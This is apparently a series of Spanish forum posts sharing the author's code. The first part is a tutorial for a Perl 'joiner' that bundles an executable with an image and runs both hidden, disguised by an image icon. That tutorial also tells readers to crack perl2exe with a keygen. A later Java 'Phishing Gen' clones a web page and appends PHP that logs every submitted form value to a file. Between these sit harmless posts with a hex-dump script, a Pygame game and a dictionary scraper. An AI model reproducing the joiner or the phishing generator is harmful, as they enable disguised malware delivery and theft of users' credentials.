0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e66696c650000000f000000feff00006701637274312e63000000000000000000000000000000000400000000000000010020000301000000000000000000000000000000000000000000001e000000000100000100200003000000000032000000200200000100200002000000000042000000400200000100200002005f61746578697400600200000100200002005f5f6f6e65786974700200000100200002002e74657874000000000000000100000003017c02000026000000000000000000000000002e64617461000000000000000200000003010000000000000000000000000000000000002e62737300000000000000000400000003010800000000000000000000000000000000002e66696c6500000019000000feff0000670163727473747566662e6300000000000000000000000055000000800200000100200002010000000000000000000000000000000000002e74657874000000800200000100000003010900000001000000000000000000000000002e64617461000000000000000200000003010000000000000000000000000000000000002e62737300000000100000000400000003010000000000000000000000000000000000002e66696c6500000027000000feff00006701686f6c616d756e646f2e63707000000000005f6d61696e000000900200000100200002000000000065000000e00800000100000003013a00000004000000000000000000020000005f67657463686172e00800000100200002002e74657874000000900200000100000003014200000005000000000000000000000000002e64617461000000000000000200000003010000000000000000000000000000000000002e62737300000000100000000400000003010000000000000000000000000000000000002e72646174610000000000000300000003011500000000000000000000000000000000002e66696c650000002f000000feff00006701435254676c6f622e630000000000000000002e74657874000000e00200000100000003010000000000000000000000000000000000002e64617461000000000000000200000003010400000000000000000000000000000000002e62737300000000100000000400000003010000000000000000000000000000000000002e66696c6500000037000000feff00006701435254666d6f64652e6300000000000000002e74657874000000e00200000100000003010000000000000000000000000000000000002e64617461000000100000000200000003010000000000000000000000000000000000002e62737300000000100000000400000003010400000000000000000000000000000000002e66696c650000003f000000feff000067017478746d6f64652e630000000000000000002e74657874000000e00200000100000003010000000000000000000000000000000000002e64617461000000100000000200000003010400000000000000000000000000000000002e62737300000000200000000400000003010000000000000000000000000000000000002e66696c6500000049000000feff0000670170736575646f2d72656c6f632e63000000000000000073000000e00200000100200002010000000000000000000000000000000000002e74657874000000e00200000100000003012800000003000000000000000000000000002e64617461000000200000000200000003010000000000000000000000000000000000002e62737300000000200000000400000003010000000000000000000000000000000000002e66696c6500000054000000feff000067014352545f667031302e6300000000000000005f6670726573657410030000010020000201000000000000000000000000000000000000000000008e000000100300000100200002002e74657874000000100300000100000003010700000000000000000000000000000000002e64617461000000200000000200000003010000000000000000000000000000000000002e62737300000000200000000400000003010000000000000000000000000000000000002e66696c6500000062000000feff000067016763636d61696e2e63000000000000000000000000009800000020000000040000000300702e3000000000002000000002000000030000000000a50000002003000001002000020100000000000000000000000000000000000000000000b8000000600300000100200002005f5f5f6d61696e00c00300000100200002002e74657874000000200300000100000003010401000011000000000000000000000000002e64617461000000200000000200000003010400000001000000000000000000000000002e62737300000000200000000400000003011000000000000000000000000000000000002e66696c6500000008010000feff0000670100000000cb000000000000000000000000002e74657874000000300400000100000003010000000000000000000000000000000000002e64617461000000300000000200000003010000000000000000000000000000000000002e627373000000003000000004000000030102000000000000000000000000000000000000000000df0000002000000003000000030000000000f000000030040000010020000301000000000000000000000000000000000000000000001401000040040000010020000300000000002901000040000000040000000300000000003c01000030000000020000000300000000004701000050000000040000000300000000005401000038000000020000000300000000005f010000e00400000100200002002e7465787400000030040000010000000301e50200002c000000000000000000000000002e64617461000000300000000200000003011000000000000000000000000000000000002e62737300000000400000000400000003012000000000000000000000000000000000002e7264617461000020000000030000000301c3000000000000000000000000000000000070726f626500000026070000010000000600646f6e65000000003d0700000100000006002e74657874000000200700000100000003012d00000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e74657874000000500700000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e6273730000000060000000040000000301000000000000000000000000000000000000000000007b010000500700000100200002010000000000000000000000000000000000002e74657874000000500700000100000003014700000005000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e74657874000000a00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437740200000500000003002e69646174612435dc0000000500000003002e69646174612434740000000500000003002e69646174612436c00100000500000003002e74657874000000a00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437680200000500000003002e69646174612435d00000000500000003002e69646174612434680000000500000003002e69646174612436940100000500000003002e74657874000000b00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437840200000500000003002e69646174612435ec0000000500000003002e69646174612434840000000500000003002e69646174612436e80100000500000003002e74657874000000b00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437780200000500000003002e69646174612435e00000000500000003002e69646174612434780000000500000003002e69646174612436c80100000500000003002e74657874000000b00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124376c0200000500000003002e69646174612435d40000000500000003002e696461746124346c0000000500000003002e69646174612436a80100000500000003002e74657874000000c00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437600200000500000003002e69646174612435c80000000500000003002e69646174612434600000000500000003002e69646174612436740100000500000003002e74657874000000d00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124379c0200000500000003002e69646174612435040100000500000003002e696461746124349c0000000500000003002e696461746124362c0200000500000003002e74657874000000e00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437640200000500000003002e69646174612435cc0000000500000003002e69646174612434640000000500000003002e69646174612436840100000500000003002e74657874000000f00700000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124377c0200000500000003002e69646174612435e40000000500000003002e696461746124347c0000000500000003002e69646174612436d40100000500000003002e74657874000000000800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124375c0200000500000003002e69646174612435c40000000500000003002e696461746124345c0000000500000003002e69646174612436640100000500000003002e74657874000000100800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437980200000500000003002e69646174612435000100000500000003002e69646174612434980000000500000003002e69646174612436200200000500000003002e74657874000000200800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437700200000500000003002e69646174612435d80000000500000003002e69646174612434700000000500000003002e69646174612436b40100000500000003002e74657874000000300800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437900200000500000003002e69646174612435f80000000500000003002e69646174612434900000000500000003002e696461746124360c0200000500000003002e74657874000000400800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437940200000500000003002e69646174612435fc0000000500000003002e69646174612434940000000500000003002e69646174612436140200000500000003002e74657874000000500800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437800200000500000003002e69646174612435e80000000500000003002e69646174612434800000000500000003002e69646174612436e00100000500000003002e74657874000000600800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437880200000500000003002e69646174612435f00000000500000003002e69646174612434880000000500000003002e69646174612436f40100000500000003002e74657874000000700800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124378c0200000500000003002e69646174612435f40000000500000003002e696461746124348c0000000500000003002e69646174612436000200000500000003002e66696c6500000018010000feff0000670166616b650000000000000000000000000000686e616d650000005c000000050000000300667468756e6b0000c40000000500000003002e74657874000000800800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612432140000000500000003011400000003000000000000000000000000002e69646174612435c00000000500000003010400000000000000000000000000000000002e69646174612434580000000500000003010400000000000000000000000000000000002e66696c6500000049010000feff0000670166616b6500000000000000000000000000002e74657874000000800800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612434a00000000500000003010400000000000000000000000000000000002e69646174612435080100000500000003010400000000000000000000000000000000002e69646174612437a00200000500000003010b00000000000000000000000000000000002e74657874000000800800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437480200000500000003002e69646174612435b80000000500000003002e69646174612434500000000500000003002e69646174612436440100000500000003002e74657874000000900800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e696461746124373c0200000500000003002e69646174612435ac0000000500000003002e69646174612434440000000500000003002e69646174612436180100000500000003002e74657874000000a00800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437440200000500000003002e69646174612435b40000000500000003002e696461746124344c0000000500000003002e69646174612436340100000500000003002e74657874000000b00800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437400200000500000003002e69646174612435b00000000500000003002e69646174612434480000000500000003002e69646174612436280100000500000003002e74657874000000c00800000100000003002e64617461000000400000000200000003002e62737300000000600000000400000003002e69646174612437380200000500000003002e69646174612435a80000000500000003002e69646174612434400000000500000003002e696461746124360c0100000500000003002e66696c6500000059010000feff0000670166616b650000000000000000000000000000686e616d6500000040000000050000000300667468756e6b0000a80000000500000003002e74657874000000d00800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612432000000000500000003011400000003000000000000000000000000002e69646174612435a40000000500000003010400000000000000000000000000000000002e696461746124343c0000000500000003010400000000000000000000000000000000002e66696c6500000067010000feff0000670166616b6500000000000000000000000000002e74657874000000d00800000100000003010000000000000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e69646174612434540000000500000003010400000000000000000000000000000000002e69646174612435bc0000000500000003010400000000000000000000000000000000002e696461746124374c0200000500000003010d00000000000000000000000000000000002e66696c6500000073010000feff0000670163727473747566662e6300000000000000000000000086010000d00800000100200003010000000000000000000000000000000000002e74657874000000d00800000100000003010900000001000000000000000000000000002e64617461000000400000000200000003010000000000000000000000000000000000002e62737300000000600000000400000003010000000000000000000000000000000000002e63746f72730000200900000100000003010400000001000000000000000000000000005f5f636578697400b007000001002000020000000000980100000001000003000000020000000000b7010000e400000005000000020000000000c70100000000000002000000020000000000d6010000280900000100000002005f667265650000003008000001002000020000000000e5010000e000000005000000020000000000f4010000e0070000010020000200000000000002000080080000010000000200000000001f02000060000000040000000200000000003a020000000000000100000002000000000049020000a0020000050000000200000000005d020000b00000000500000002000000000070020000e8000000050000000200000000007d02000000100000ffff00000200000000009602000000002000ffff0000020000000000b002000004000000ffff0000020000000000cc0200000000000001000000020000000000de020000c008000001000000020000000000ea0200000000000001000000020000000000fc020000200700000100000002000000000006030000000000000100000002000000000016030000c8000000050000000200000000002a030000dc0000000500000002005f5f66696c62756620080000010020000200000000003603000000000000040000000200000000004403000000010000030000000200000000006703000000100000ffff00000200000000007f030000c0070000010020000200000000008d03000000000000010000000200000000009f0300000000000001000000020000000000af030000040100000500000002005f5f646c6c5f5f0000000000ffff0000020000000000bd03000000000000ffff0000020000000000d2030000ec00000005000000020000000000e00300001400000005000000020000000000f303000000004000ffff00000200000000000204000000100000ffff000002000000000018040000000100000300000002000000000036040000cc0000000500000002005f5f6172676300000400000004000000020000000000480400009008000001000000020000000000570400004000000002000000020000000000640400000008000001002000020000000000730400007000000004000000020000000000840400001c0900000100000002000000000092040000a00700000100000002005f66666c757368006008000001002000020000000000a2040000b000000004000000020000000000ae0400001000000004000000020000000000ba040000000000000100000002005f667072696e7466700800000100200002005f5f616c6c6f63612007000001000000020000000000ca040000000000000100000002005f5f6172677600000000000004000000020000000000dc0400001c09000001000000020000000000eb040000b40000000500000002005f5f666d6f64650010000000020000000200000000000205000000020000ffff000002000000000015050000fc000000050000000200000000002305000004000000ffff000002005f5f656e645f5f00000000000100000002005f7369676e616c00d00700000100200002005f6d616c6c6f6300400800000100200002000000000038050000280900000100000002000000000046050000f4000000050000000200000000005505000000001000ffff00000200000000006e05000000000000010000000200000000008005000003000000ffff00000200000000008e050000f00000000500000002005f61626f7274000050080000010020000200000000009c0500008000000004000000020000000000b8050000c400000005000000020000000000cd0500000000000001000000020000000000da050000ac00000005000000020000000000ef050000f800000005000000020000000000fb050000b8000000050000000200000000002006000001000000ffff00000200000000003806000000000000ffff000002000000000049060000000000000200000002000000000054060000f0070000010020000200000000005e06000000010000050000000200000000006c060000a8000000050000000200000000007e060000000000000500000002000000000093060000d400000005000000020000000000a106000000000000ffff0000020000000000bd06000000000000ffff0000020000000000d5060000d800000005000000020000000000e4060000d000000005000000020000000000fa060000b00800000100000002005f7072696e746600100800000100200002000000000007070000a0080000010000000200000000001807000000010000030000000200000000003a0700004c020000050000000200000000005007000000000000010000000200600700005f5f676e755f657863657074696f6e5f68616e646c65724034005f5f5f6d696e67775f43525453746172747570005f6d61696e43525453746172747570005f57696e4d61696e43525453746172747570005f5f5f646f5f736a6c6a5f696e6974002e746578742467657463686172005f5f7065693338365f72756e74696d655f72656c6f6361746f72005f5f66707265736574005f696e697469616c697a6564005f5f5f646f5f676c6f62616c5f64746f7273005f5f5f646f5f676c6f62616c5f63746f72730070736575646f2d72656c6f632d6c6973742e63005f7733325f61746f6d5f737566666978005f5f5f7733325f7368617265647074725f64656661756c745f756e6578706563746564005f5f5f7733325f7368617265647074725f676574006477325f6f626a6563745f6d757465782e30006477325f6f6e63652e3100736a6c5f66635f6b65792e3200736a6c5f6f6e63652e33005f5f5f7733325f7368617265647074725f696e697469616c697a65005f5f5f657072696e7466005f5f5f736a6c6a5f696e69745f63746f72005f5f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f5f005f5f696d705f5f5f7365746d6f6465005f5f646174615f73746172745f5f005f5f5f44544f525f4c4953545f5f005f5f696d705f5f5f6f6e65786974005f5f5f705f5f666d6f6465005f536574556e68616e646c6564457863657074696f6e46696c7465724034005f5f5f7733325f7368617265647074725f7465726d696e617465005f5f5f746c735f73746172745f5f005f5f6c69626d73766372745f615f696e616d65005f5f696d705f5f46696e6441746f6d414034005f5f696d705f5f61626f7274005f5f73697a655f6f665f737461636b5f636f6d6d69745f5f005f5f73697a655f6f665f737461636b5f726573657276655f5f005f5f6d616a6f725f73756273797374656d5f76657273696f6e5f5f005f5f5f6372745f786c5f73746172745f5f005f41646441746f6d414034005f5f5f6372745f78695f73746172745f5f005f5f5f63686b73746b005f5f5f6372745f78695f656e645f5f005f5f696d705f5f5f5f705f5f656e7669726f6e005f5f696d705f5f5f696f62005f5f6273735f73746172745f5f005f5f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f454e445f5f005f5f73697a655f6f665f686561705f636f6d6d69745f5f005f5f5f705f5f656e7669726f6e005f5f5f6372745f78705f73746172745f5f005f5f5f6372745f78705f656e645f5f005f5f696d705f5f7369676e616c005f5f6d696e6f725f6f735f76657273696f6e5f5f005f5f696d705f5f617465786974005f5f686561645f6c69626d73766372745f61005f5f696d6167655f626173655f5f005f5f73656374696f6e5f616c69676e6d656e745f5f005f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f5f005f5f696d705f5f5f5f705f5f666d6f6465005f4578697450726f636573734034005f5f646174615f656e645f5f005f5f5f6765746d61696e61726773005f5f5f7733325f736861726564707472005f5f43544f525f4c4953545f5f005f5f5f7365745f6170705f74797065005f5f6273735f656e645f5f005f5f4352545f666d6f6465005f5f5f6372745f78635f656e645f5f005f5f5f6372745f78635f73746172745f5f005f5f5f43544f525f4c4953545f5f005f5f696d705f5f47657441746f6d4e616d6541403132005f5f66696c655f616c69676e6d656e745f5f005f5f696d705f5f6d616c6c6f63005f5f6d616a6f725f6f735f76657273696f6e5f5f005f5f44544f525f4c4953545f5f005f5f696d705f5f667072696e7466005f5f73697a655f6f665f686561705f726573657276655f5f005f5f5f6372745f78745f73746172745f5f005f5f73756273797374656d5f5f005f5f696d705f5f66666c757368005f5f5f7733325f7368617265647074725f756e6578706563746564005f5f696d705f5f5f5f6765746d61696e61726773005f5f5f746c735f656e645f5f005f5f696d705f5f4578697450726f636573734034005f5f696d705f5f66726565005f5f696d705f5f536574556e68616e646c6564457863657074696f6e46696c7465724034005f5f6d616a6f725f696d6167655f76657273696f6e5f5f005f5f6c6f616465725f666c6167735f5f005f5f4352545f676c6f62005f5f7365746d6f6465005f5f696d705f5f7072696e7466005f5f696d705f5f41646441746f6d414034005f5f686561645f6c69626b65726e656c33325f61005f5f696d705f5f5f6365786974005f5f6d696e6f725f73756273797374656d5f76657273696f6e5f5f005f5f6d696e6f725f696d6167655f76657273696f6e5f5f005f5f696d705f5f5f66696c627566005f5f696d705f5f5f5f7365745f6170705f74797065005f46696e6441746f6d414034005f47657441746f6d4e616d6541403132005f5f52554e54494d455f50534555444f5f52454c4f435f4c4953545f454e445f5f005f5f6c69626b65726e656c33325f615f696e616d65005f5f5f6372745f78745f656e645f5f00";


Como ven , usamos primero los bytes de la imagen y despues los del archivo exe que es un simple hola mundo en c.

Ahora nos toca crear los archivos :

Código (perl) [Seleccionar] Expandir


open( NOMBRE_UNO, ">>" . $nombre_uno )
 ;    ## Creamos el archivo con el nombre marcado en el codigo anterior
binmode(NOMBRE_UNO);    # Lo abrimos de forma binaria
my $test_uno = pack "H*",
 $valor_uno;           # Decodificamos el hexadecimal (gracias a explorer)

print NOMBRE_UNO $test_uno
 ;    # Escribimos el resultado de la decodificacion en el archivo creado
close(NOMBRE_UNO);    # Cerramos el archivo

open( NOMBRE_DOS, ">>" . $nombre_dos );    # Lo mismo pero con el otro archivo
binmode(NOMBRE_DOS);                       # Lo mismo pero con el otro archivo
my $test_dos = pack "H*", $valor_dos;      # Lo mismo pero con el otro archivo

print NOMBRE_DOS $test_dos;                # Lo mismo pero con el otro archivo
close NOMBRE_DOS;      


Ya casi terminamos , lo que nos falta ahora es cargar los archivos al mismo tiempo de la siguiente forma :

Código (perl) [Seleccionar] Expandir


my $comando1 = threads->new( \&uno );      # thread para cargar el archivo
my $comando2 = threads->new( \&dos );      # thread para cargar el otro archivo

$comando1->join();                         # empezamos
$comando2->join();                         # lo mismo

sub uno {    # funcion para cargar el primer archivo
   cargar_hide($nombre_uno);
}

sub dos {    #funcion para cargar el segundo archivo
   cargar_hide($nombre_dos);
}

sub cargar_hide {    # nombre de la funcion marcada anteriormente

   my $job = Win32::Job->new;

   $job->spawn( "cmd", qq{cmd /C $_[0]}, { no_window => "true" } )
     ;              # cargamos el archivo de forma oculta
   $ok = $job->run("30");

}


Con eso terminanos el archivo joiner.pl

0x03 : Compilacion

Esto es lo mas importante , porque es para pasar el script joiner.pl a exe , entonces retomamos el archivo descomprimido y vemos que tenemos un directorio llamado "PERL2EXE" dentro de el tenemos un archivo llamado keygen lo cargamos y llenamos los datos que nos pide con cualquier cosa , cuando nos devuelva el supuesto serial cargamos perl2exe de la siguiente forma "perl2exe -register" , pegamos el serial y le damos enter , despues de eso si todo salio bien tendremos perl2exe a nuestro placer.

Entonces para compilar el script hacemos lo siguiente :

Código (perl) [Seleccionar] Expandir


perl2exe -icon=imagen.ico -gui joiner.pl


El archivo imagen.ico lo encontraran en el archivo descomprimido y sirve para darle algo de realismo a la supuesta imagen que nos muestra a coraje el perro cobarde , honestamente ni un ciego caeria en tal absurdo intento de joiner pero solo lo hice para dejar la idea como hacerlo en perl xDD.

Algo importante a mencionar es que el joiner.pl no funciona como queremos pero cuando lo pasamos a exe anda bien me refiero a que el tema de la consola molesta se borra en joiner.pl y no se muestra ningun archivo pero cuando lo pasamos a exe con perl2exe anda todo de maravilla.

0x04 : Herramientas y Codigos finales

El archivo joiner.pl
El archivo hexnow.pl

Eso seria todo , cualquier sugerencia para mejorar la idea diganla.

Un simple script para convertir el codigo de un archivo en hexadecimal , muy util para un proyecto que tengo en mente.
El script es una traduccion a perl del famoso programa getbytes.py hecho por hecky neobits.

El codigo :

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#HexNow 0.1
#Coded By Doddy H
#Script based in getbytes.py made by hecky neobits
#Thanks to hecky neobits & explorer(perlenespanol)

use Getopt::Long;
use File::Basename;
use Cwd;

chdir( getcwd() );

GetOptions(
    "hex=s"      => \$hex,
    "each=s"     => \$hexeach,
    "output=i"   => \$output,
    "savefile=s" => \$savefile
);

head();

if ($hex) {

    my $code_final;

    if ($hexeach) {

        my $st = unpack "H*", getcontent($hex);
        my $reco;

        for ( my $num = 0 ; $num <= length($st) - 1 ; $num += $hexeach ) {
            my $final = substr $st, $num, $hexeach;
            $reco .= $final . "\n";
        }

        $code_final = $reco;

    }
    else {
        $code_final = unpack "H*", getcontent($hex);
    }

    if ( $output eq "1" ) {

        print "\n\n[+] Encoding ....\n";

        print "\n[Start]\n\n";
        print $code_final;
        print "\n\n[End]\n";

    }

    if ($savefile) {
        savefile( $savefile, $code_final );
        print "\n[+] Result generated in : $savefile\n";
    }
    else {
        my $div = basename($hex);
        if ( $div =~ /(.*)\.(.*)/ ) {
            my $listo = $1 . "_hex.txt";
            savefile( $listo, $code_final );
            print "\n[+] Result generated in : $listo\n";
        }
    }

    copyright();

}

sub head {
    print qq(

             _____
      ,----/,--.   `.
     /    '. `-'     \         Program Name : HexNow
     | ____ \      '`|_        Version : 0.1
     \'.--._/` _     \ '.       Author : Doddy H
          /'-|/ \|`\|-`  \       Script based in getbytes.py made by hecky neobits 
         /   /       \   |     Thanks to hecky neobits
         |  ;    '`  |  .'
         '. |;;      ;  /
          \ \ ;     / ,'        Examples :
           ;--,   .,--,
        __||=|=|./|=|=||___   perl hexnow.pl -hex imagen.jpg
          `'-'-'  `-'-'`      perl hexnow.pl -hex imagen.jpg -each 5
      ______________________  perl hexnow.pl -hex imagen.jpg -output 1
          /'/ /  \  \ \          perl hexnow.pl -hex imagen.jpg -savefile test.txt
         / '.';  ; \ ' \
        '-/   | ; | ; \-'
          \_| |   | |_/        The End ?
            `-'\_/`-'

);
}

sub copyright {
    print "\n(C) Doddy Hackman 2013\n";
    exit(1);
}

sub getcontent {

    open( FILE, $_[0] );
    binmode(FILE);
    my @lines = <FILE>;
    close FILE;

    $code = join "", @lines;
    return $code;

}

sub savefile {

    if ( -f $_[0] ) {
        unlink( $_[0] );
    }

    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1];
    close SAVE;
}

#The End ?


Bue , recien acabo de terminar mi primer juego en Pygame , para hacerlo me base en el famoso juego Rock Blaster hecho por Jeff Walters.
El juego trata de sobrevivir 1 minuto en un barrio peligroso , comienzan a llover ladrones armados por todos lados y el protagonista tiene una M4 con municion infinita.
A grandes rasgos el juego esta basado en la vida real solo que en este caso no todos tenemos una M4 xDDD.

Una imagen del juego :



EL codigo :

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#UrbanWar 0.1
#Coded By Doddy H in the year 2013
#My first game in Pygame
#Based in the game Rock Blaster made by Jeff Walters
#Thanks to Jeff Walters

import pygame
import sys,os,time
from pygame.locals import *
import random

tiempoportiro = 1

class theboss(pygame.sprite.Sprite):

def __init__(self,esto):
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/ladron.gif")
  self.rect = self.image.get_rect( center = (random.randint(0,860),0))
  self.cada = esto

def update(self):
  self.rect.move_ip(self.cada,3)
 
class protagonista(pygame.sprite.Sprite):

def __init__(self):
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/protagonista.gif")
  self.rect = self.image.get_rect(center = (860,640))

def update(self):
  global tiempoportiro
  if pygame.key.get_pressed()[K_LEFT]:
   self.rect.move_ip(-5,0)
  if pygame.key.get_pressed()[K_RIGHT]:
   self.rect.move_ip(5,0)
  if pygame.key.get_pressed()[K_SPACE] and tiempoportiro <= 0:
   pygame.mixer.Sound("archivos/disparo.wav").play()
   tiempoportiro = 25
   cartucho(self.rect.midtop)
  tiempoportiro -= 1
  self.rect.clamp_ip(Rect(0,0,860,640))

class chau(pygame.sprite.Sprite):

def __init__(self, actor):
  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/explo.gif")
  self.rect = self.image.get_rect(center=actor.rect.center)
  self.tie = 10

def update(self):
  self.tie = self.tie - 2
  if self.tie <= 0:
   self.kill()
   
class cartucho(pygame.sprite.Sprite):

def __init__(self,toyaca):

  pygame.sprite.Sprite.__init__(self,self.mas)
  self.image = pygame.image.load("archivos/bala.gif")
  self.rect = self.image.get_rect(midbottom = toyaca)

def update(self):
  self.rect.move_ip(-30,-50)
  if not Rect(0,0,860,640).contains(self.rect):
   self.kill()
 
pygame.init()

mil = 0
theboss_cadacuanto = 30

cro = pygame.time.Clock()

pantalla = pygame.display.set_mode((860,640),0,32)
#pantalla = pygame.display.set_mode((860,640),FULLSCREEN) # FULLSCREEN

fondo = pygame.image.load("archivos/callejon.jpg")
pygame.display.set_caption("UrbanWar 0.1")
pygame.mouse.set_visible(False)

protagonistamas = pygame.sprite.Group()

protagonista.mas = protagonistamas
protagonista = protagonista()

thebossmas = pygame.sprite.Group()
theboss.mas = thebossmas

cartuchomas = pygame.sprite.Group()
cartucho.mas = cartuchomas

chaumas = pygame.sprite.Group()
chau.mas = chaumas

mostrar = pygame.font.Font("archivos/FreeSansBold.ttf",36)

pygame.mixer.Sound("archivos/menu.wav").play()
men = pygame.image.load("archivos/menu.jpg")
pantalla.blit(men,(0,0))
pygame.display.update()
time.sleep(9)

while 1:
           
mil += cro.tick()
casi = mil/1000
casi = 60 - casi

if casi == 0:
  win = pygame.image.load("archivos/mina.jpg")
  pantalla.blit(win,(0,0))
  pygame.display.update()
  time.sleep(10)
  sys.exit(1)

tiempoquefalta = mostrar.render("Remaining Time : "+str(casi),True,(255,0,0))             
pantalla.blit(tiempoquefalta,(500,20))
pygame.display.update()

pantalla.blit(fondo,(0,0))

protagonistamas.draw(pantalla)
protagonistamas.update()
thebossmas.draw(pantalla)
thebossmas.update()
cartuchomas.draw(pantalla)
cartuchomas.update()
chaumas.draw(pantalla)
chaumas.update()

if theboss_cadacuanto:
  theboss_cadacuanto = theboss_cadacuanto - 1
else:
  asteroid = theboss(random.randint(-6,5))
  theboss_cadacuanto = 20
 
for asteroid in pygame.sprite.groupcollide(cartuchomas,thebossmas,1,1):
  pygame.mixer.Sound("archivos/muerte.wav").play()
  chau(asteroid)
   
for asteroid in pygame.sprite.spritecollide(protagonista,thebossmas,1):
  pygame.mixer.Sound("archivos/muerte.wav").play()
  chau(protagonista)
  protagonista.kill()
 
  over = pygame.image.load("archivos/gameover.jpg")
  pantalla.blit(over,(0,0))
  pygame.display.update()
  time.sleep(10)
  sys.exit(1)

for event in pygame.event.get():
  if event.type == QUIT:
   break
  cap = pygame.key.get_pressed();
  if cap[K_ESCAPE]:
   sys.exit(1)

pygame.display.update()

#The End ?


Para bajar el codigo con las imagenes o el juego compilado lo pueden hacer de aca.

Practicando en este lenguaje hice este simple diccionario online , solo ponen una palabra y el programa les devuelve el significado (si es que lo encuentra xDD)

Código (java) [Seleccionar] Expandir


//Diccionario Online 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.*;
import java.io.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;

        String palabra;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == Diccionario Online 0.1 == --\n\n");
        System.out.println("[+] Palabra : ");
        palabra = host.nextLine();

        code = toma("http://es.thefreedictionary.com/" + palabra);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("<div class=runseg><b>1 </b>&nbsp; (.*?)[.:<]");
        dos = uno.matcher(code);

        if (dos.find()) {
            System.out.println("\n" + dos.group(1));
        } else {
            System.out.println("\n[-] No se encontro el significado");
        }

        System.out.println("\n\n-- == Coded By Doddy H == --\n\n");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();
    }
}

//The End ?


Tratando de practicar este lenguaje hice este simple generador de fakes.

Código (java) [Seleccionar] Expandir


//Phishing Gen 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;
        String iny;
        String pagina;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == Phishing Gen 0.1 == --\n\n");
        System.out.println("[+] Pagina : ");
        pagina = host.nextLine();

        iny = "<?php $file = fopen('dump.txt','a');foreach($_POST as $uno => $dos) {fwrite($file, $uno.'='.$dos.'\r\n');}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres.'='.$cuatro.'\r\n');}fclose($file); ?>";

        code = toma(pagina);

        savefile("fake.php", code + iny);

        System.out.println("\n[+] Fake Ready");

        System.out.println("\n\n-- == Coded By Doddy H == --\n\n");
    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();
    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }
}

//The End ?


Este es mi primer template , lo hice porque queria hacer un diseño parecido que vi en internet si quieren verlo lo puede hacer de aca , es bien basico solo hice el index.
Pueden bajar el template desde aca.

Una imagen



Cualquier sugerencia diganla para mejorar.

